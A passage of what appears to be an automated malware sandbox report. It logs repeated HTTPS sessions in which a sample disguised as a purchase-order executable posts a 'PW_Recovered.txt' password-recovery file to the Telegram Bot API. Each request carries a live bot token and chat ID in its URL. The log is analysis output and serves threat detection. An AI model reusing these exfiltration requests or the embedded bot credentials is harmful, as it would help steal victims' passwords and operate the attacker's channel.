                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:20 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17183,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354919,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.449803149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:21 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd20fb68695da8
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:21 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 62 36 38 36 39 35 64 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd20fb68695da8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:22 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:21 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:22 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17185,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354921,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.449809149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:23 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd21311e408dc9
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:23 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 33 31 31 65 34 30 38 64 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd21311e408dc9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:24 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:23 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:24 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17187,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354923,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.449815149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:25 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd216cdca9611f
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:25 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 63 64 63 61 39 36 31 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd216cdca9611fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:26 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:25 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:26 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17189,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354925,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.449821149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:27 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd21b60195c746
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:27 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 62 36 30 31 39 35 63 37 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd21b60195c746Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:28 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:27 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:28 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17191,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354927,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.449824149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:29 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd2201535bf242
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:15:29 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 31 35 33 35 62 66 32 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd2201535bf242Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:29 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:30 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17193,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354929,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.449829149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:31 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd22651478ebb6
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:15:31 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 36 35 31 34 37 38 65 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd22651478ebb6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:15:32 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:15:31 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:15:32 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17195,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354931,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.449835149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:15:33 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd22b575741c71
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
